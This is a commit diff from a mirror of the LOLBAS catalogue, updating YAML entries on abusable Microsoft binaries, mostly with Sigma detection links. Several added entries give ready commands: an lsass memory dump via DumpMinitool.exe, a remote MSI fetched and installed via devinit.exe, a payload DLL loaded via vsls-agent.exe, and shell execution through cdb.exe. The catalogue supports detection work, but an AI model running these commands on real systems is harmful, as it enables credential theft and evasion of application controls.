public-mirrors/LOLBAS
1
0
Fork 0
mirror of https://github.com/LOLBAS-Project/LOLBAS synced 2025-07-31 22:52:51 +02:00
Code Issues Projects Releases Wiki Activity

Merge pull request #3 from LOLBAS-Project/master

Browse Source 
Merge master branch from official project
This commit is contained in:
C-h4ck-0
2023-04-30 14:35:28 +03:00
committed by GitHub
parent e803bc7635 787c87470e
commit 5f14405172
38 changed files with 254 additions and 40 deletions
Download Patch File Download Diff File Expand all files Collapse all files

1
yml/OtherMSBinaries/AccCheckConsole.yml
View File

@@ -26,6 +26,7 @@ Full_Path:
Code_Sample:
- Code: https://docs.microsoft.com/en-us/windows/win32/winauto/custom-verification-routines
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_susp_acccheckconsole.yml
- IOC: Sysmon Event ID 1 - Process Creation
- Analysis: https://gist.github.com/bohops/2444129419c8acf837aedda5f0e7f340
Resources:

2
yml/OtherMSBinaries/Adplus.yml
View File

@@ -41,7 +41,7 @@ Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/6199a703221a98ae6ad343c79c558da375203e4e/rules/windows/process_creation/proc_creation_win_lolbin_adplus.yml
- IOC: As a Windows SDK binary, execution on a system may be suspicious
Resources:
- Link: https://blog.thecybersecuritytutor.com/adplus-debugging-tool-lsass-dump/
- Link: https://mrd0x.com/adplus-debugging-tool-lsass-dump/
- Link: https://twitter.com/nas_bench/status/1534916659676422152
- Link: https://twitter.com/nas_bench/status/1534915321856917506
Acknowledgement:

2
yml/OtherMSBinaries/Agentexecutor.yml
View File

@@ -23,6 +23,8 @@ Full_Path:
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_agentexecutor.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_agentexecutor_susp_usage.yml
Resources:
- Link:
Acknowledgement:

8
yml/OtherMSBinaries/Cdb.yml
View File

@@ -1,7 +1,7 @@
---
Name: Cdb.exe
Description: Debugging tool included with Windows Debugging Tools.
Author: 'Oddvar Moe'
Author: Oddvar Moe
Created: 2018-05-25
Commands:
- Command: cdb.exe -cf x64_calc.wds -o notepad.exe
@@ -12,8 +12,8 @@ Commands:
MitreID: T1127
OperatingSystem: Windows
- Command: |
cdb.exe -pd -pn <process_name>
.shell <cmd>
cdb.exe -pd -pn <process_name>
.shell <cmd>
Description: Attaching to any process and executing shell commands.
Usecase: Run a shell command under a trusted Microsoft signed binary
Category: Execute
@@ -41,7 +41,7 @@ Resources:
- Link: http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html
- Link: https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/cdb-command-line-options
- Link: https://gist.github.com/mattifestation/94e2b0a9e3fe1ac0a433b5c3e6bd0bda
- Link: https://blog.thecybersecuritytutor.com/the-power-of-cdb-debugging-tool/
- Link: https://mrd0x.com/the-power-of-cdb-debugging-tool/
- Link: https://twitter.com/nas_bench/status/1534957360032120833
Acknowledgement:
- Person: Matt Graeber

9
yml/OtherMSBinaries/Createdump.yml
View File

@@ -1,8 +1,8 @@
---
Name: Createdump.exe
Description: Microsoft .NET Runtime Crash Dump Generator (included in .NET Core)
Author: Daniel Santos
Created: 2022-08-05
Author: mr.d0x, Daniel Santos
Created: 2022-01-20
Commands:
- Command: createdump.exe -n -f dump.dmp [PID]
Description: Dump process by PID and create a minidump file. If "-f dump.dmp" is not specified, the file is created as '%TEMP%\dump.%p.dmp' where %p is the PID of the target process.
@@ -13,7 +13,12 @@ Commands:
OperatingSystem: Windows 10, Windows 11
Full_Path:
- Path: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\*\createdump.exe
- Path: C:\Program Files (x86)\dotnet\shared\Microsoft.NETCore.App\*\createdump.exe
- Path: C:\Program Files\Microsoft Visual Studio\*\Community\dotnet\runtime\shared\Microsoft.NETCore.App\6.0.0\createdump.exe
- Path: C:\Program Files (x86)\Microsoft Visual Studio\*\Community\dotnet\runtime\shared\Microsoft.NETCore.App\6.0.0\createdump.exe
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_proc_dump_createdump.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_susp_renamed_createdump.yml
- IOC: createdump.exe process with a command line containing the lsass.exe process id
Resources:
- Link: https://twitter.com/bopin2020/status/1366400799199272960

21
yml/OtherMSBinaries/Devinit.yml Normal file
View File

@@ -0,0 +1,21 @@
---
Name: Devinit.exe
Description: Visual Studio 2019 tool
Author: mr.d0x
Created: 2022-01-20
Commands:
- Command: devinit.exe run -t msi-install -i https://example.com/out.msi
Description: Downloads an MSI file to C:\Windows\Installer and then installs it.
Usecase: Executes code from a (remote) MSI file.
Category: Execute
Privileges: User
MitreID: T1218.007
OperatingSystem: Windows 10, Windows 11
Full_Path:
- Path: C:\Program Files\Microsoft Visual Studio\*\Community\Common7\Tools\devinit\devinit.exe
- Path: C:\Program Files (x86)\Microsoft Visual Studio\*\Community\Common7\Tools\devinit\devinit.exe
Resources:
- Link: https://twitter.com/mrd0x/status/1460815932402679809
Acknowledgement:
- Person: mr.d0x
Handle: '@mrd0x'

12
yml/OtherMSBinaries/Dotnet.yml
View File

@@ -18,13 +18,20 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows 7 and up with .NET installed
- Command: dotnet.exe fsi
Description: dotnet.exe will open a console which allows for the execution of arbitrary F# commands
Usecase: Execute arbitrary F# code
Category: Execute
Privileges: User
MitreID: T1059
OperatingSystem: Windows 10 and up with .NET SDK installed
- Command: dotnet.exe msbuild [Path_TO_XML_CSPROJ]
Description: dotnet.exe with msbuild (SDK Version) will execute unsigned code
Usecase: Execute code bypassing AWL
Category: AWL Bypass
Privileges: User
MitreID: T1218
OperatingSystem: Windows 10 with .NET Core installed
OperatingSystem: Windows 10 and up with .NET Core installed
Full_Path:
- Path: 'C:\Program Files\dotnet\dotnet.exe'
Detection:
@@ -35,8 +42,11 @@ Resources:
- Link: https://twitter.com/_felamos/status/1204705548668555264
- Link: https://gist.github.com/bohops/3f645a7238d8022830ecf5511b3ecfbc
- Link: https://bohops.com/2019/08/19/dotnet-core-a-vector-for-awl-bypass-defense-evasion/
- Link: https://learn.microsoft.com/en-us/dotnet/fsharp/tools/fsharp-interactive/
Acknowledgement:
- Person: felamos
Handle: '@_felamos'
- Person: Jimmy
Handle: '@bohops'
- Person: yamalon
Handle: '@mavinject'

20
yml/OtherMSBinaries/DumpMinitool.yml Normal file
View File

@@ -0,0 +1,20 @@
---
Name: DumpMinitool.exe
Description: Dump tool part Visual Studio 2022
Author: mr.d0x
Created: 2022-01-20
Commands:
- Command: DumpMinitool.exe --file c:\users\mr.d0x\dump.txt --processId 1132 --dumpType Full
Description: Creates a memory dump of the lsass process
Usecase: Create memory dump and parse it offline
Category: Dump
Privileges: Administrator
MitreID: T1003.001
OperatingSystem: Windows 10, Windows 11
Full_Path:
- Path: C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\Extensions\TestPlatform\Extensions
Resources:
- Link: https://twitter.com/mrd0x/status/1511415432888131586
Acknowledgement:
- Person: mr.d0x
Handle: '@mrd0x'

2
yml/OtherMSBinaries/Fsi.yml
View File

@@ -1,4 +1,3 @@
---
Name: Fsi.exe
Description: 64-bit FSharp (F#) Interpreter included with Visual Studio and DotNet Core SDK.
Author: Jimmy (@bohops)
@@ -28,6 +27,7 @@ Detection:
- Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml
- BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
- IOC: Fsi.exe execution may be suspicious on non-developer machines
- Sigma: https://github.com/SigmaHQ/sigma/blob/6b34764215b0e97e32cbc4c6325fc933d2695c3a/rules/windows/process_creation/proc_creation_win_lolbin_fsharp_interpreters.yml
Resources:
- Link: https://twitter.com/NickTyrer/status/904273264385589248
- Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/

1
yml/OtherMSBinaries/FsiAnyCpu.yml
View File

@@ -25,6 +25,7 @@ Code_Sample:
Detection:
- BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
- IOC: FsiAnyCpu.exe execution may be suspicious on non-developer machines
- Sigma: https://github.com/SigmaHQ/sigma/blob/6b34764215b0e97e32cbc4c6325fc933d2695c3a/rules/windows/process_creation/proc_creation_win_lolbin_fsharp_interpreters.yml
Resources:
- Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/
Acknowledgement:

1
yml/OtherMSBinaries/Mftrace.yml
View File

@@ -26,6 +26,7 @@ Full_Path:
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_mftrace.yml
Resources:
- Link: https://twitter.com/0rbz_/status/988911181422186496
Acknowledgement:

21
yml/OtherMSBinaries/Microsoft.NodejsTools.PressAnyKey.yml Normal file
View File

@@ -0,0 +1,21 @@
---
Name: Microsoft.NodejsTools.PressAnyKey.exe
Description: Part of the NodeJS Visual Studio tools.
Author: mr.d0x
Created: 2022-01-20
Commands:
- Command: Microsoft.NodejsTools.PressAnyKey.exe normal 1 cmd.exe
Description: Launch cmd.exe as a subprocess of Microsoft.NodejsTools.PressAnyKey.exe.
Usecase: Spawn a new process via Microsoft.NodejsTools.PressAnyKey.exe.
Category: Execute
Privileges: User
MitreID: T1127
OperatingSystem: Windows
Full_Path:
- Path: C:\Program Files\Microsoft Visual Studio\*\Community\Common7\IDE\Extensions\Microsoft\NodeJsTools\NodeJsTools\Microsoft.NodejsTools.PressAnyKey.exe
- Path: C:\Program Files (x86)\Microsoft Visual Studio\*\Community\Common7\IDE\Extensions\Microsoft\NodeJsTools\NodeJsTools\Microsoft.NodejsTools.PressAnyKey.exe
Resources:
- Link: https://twitter.com/mrd0x/status/1463526834918854661
Acknowledgement:
- Person: mr.d0x
Handle: '@mrd0x'

1
yml/OtherMSBinaries/MsoHtmEd.yml
View File

@@ -28,6 +28,7 @@ Full_Path:
- Path: C:\Program Files\Microsoft Office\Office12\MSOHTMED.exe
- Path: C:\Program Files\Microsoft Office\Office12\MSOHTMED.exe
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_msohtmed_download.yml
- IOC: Suspicious Office application internet/network traffic
Acknowledgement:
- Person: Nir Chako (Pentera)

1
yml/OtherMSBinaries/Mspub.yml
View File

@@ -25,6 +25,7 @@ Full_Path:
- Path: C:\Program Files (x86)\Microsoft Office\Office14\MSPUB.exe
- Path: C:\Program Files\Microsoft Office\Office14\MSPUB.exe
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_mspub_download.yml
- IOC: Suspicious Office application internet/network traffic
Acknowledgement:
- Person: 'Nir Chako (Pentera)'

1
yml/OtherMSBinaries/Remote.yml
View File

@@ -32,6 +32,7 @@ Code_Sample:
- Code:
Detection:
- IOC: remote.exe process spawns
- Sigma: https://github.com/SigmaHQ/sigma/blob/197615345b927682ab7ad7fa3c5f5bb2ed911eed/rules/windows/process_creation/proc_creation_win_lolbin_remote.yml
Resources:
- Link: https://blog.thecybersecuritytutor.com/Exeuction-AWL-Bypass-Remote-exe-LOLBin/
Acknowledgement:

2
yml/OtherMSBinaries/Squirrel.yml
View File

@@ -44,6 +44,8 @@ Full_Path:
Code_Sample:
- Code: https://github.com/jreegun/POC-s/tree/master/nuget-squirrel
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_squirrel.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_susp_squirrel_lolbin.yml
Resources:
- Link: https://www.youtube.com/watch?v=rOP3hnkj7ls
- Link: https://twitter.com/reegun21/status/1144182772623269889

1
yml/OtherMSBinaries/VSIISExeLauncher.yml
View File

@@ -16,6 +16,7 @@ Full_Path:
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_vsiisexelauncher.yml
- IOC: VSIISExeLauncher.exe spawned an unknown process
Resources:
- Link: https://github.com/timwhitez

2
yml/OtherMSBinaries/VisualUiaVerifyNative.yml
View File

@@ -1,4 +1,3 @@
---
Name: VisualUiaVerifyNative.exe
Description: A Windows SDK binary for manual and automated testing of Microsoft UI Automation implementation and controls.
Author: Jimmy (@bohops)
@@ -19,6 +18,7 @@ Code_Sample:
- Code:
Detection:
- BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
- Sigma: https://github.com/SigmaHQ/sigma/blob/6b34764215b0e97e32cbc4c6325fc933d2695c3a/rules/windows/process_creation/proc_creation_win_lolbin_visualuiaverifynative.yml
- IOC: As a Windows SDK binary, execution on a system may be suspicious
Resources:
- Link: https://bohops.com/2020/10/15/exploring-the-wdac-microsoft-recommended-block-rules-visualuiaverifynative/

1
yml/OtherMSBinaries/Wfc.yml
View File

@@ -17,6 +17,7 @@ Code_Sample:
- Code: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/
Detection:
- BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
- Sigma: https://github.com/SigmaHQ/sigma/blob/6b34764215b0e97e32cbc4c6325fc933d2695c3a/rules/windows/process_creation/proc_creation_win_lolbin_wfc.yml
- IOC: As a Windows SDK binary, execution on a system may be suspicious
Resources:
- Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/

1
yml/OtherMSBinaries/Winword.yml
View File

@@ -31,6 +31,7 @@ Full_Path:
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_winword.yml
- IOC: Suspicious Office application Internet/network traffic
Resources:
- Link: https://twitter.com/reegun21/status/1150032506504151040

22
yml/OtherMSBinaries/vsls-agent.yml Normal file
View File

@@ -0,0 +1,22 @@
---
Name: vsls-agent.exe
Description: Agent for Visual Studio Live Share (Code Collaboration)
Author: Jimmy (@bohops)
Created: 2022-11-01
Commands:
- Command: vsls-agent.exe --agentExtensionPath c:\path\to\payload.dll
Description: Load a library payload using the --agentExtensionPath parameter (32-bit)
Usecase: Execute proxied payload with Microsoft signed binary
Category: Execute
Privileges: User
MitreID: T1218
OperatingSystem: Windows 10 21H2 (likely previous and newer versions with modern versions of Visual Studio installed)
Full_Path:
- Path: c:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\Extensions\Microsoft\LiveShare\Agent\vsls-agent.exe
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_susp_vslsagent_agentextensionpath_load.yml
Resources:
- Link: https://twitter.com/bohops/status/1583916360404729857
Acknowledgement:
- Person: Jimmy
Handle: '@bohops'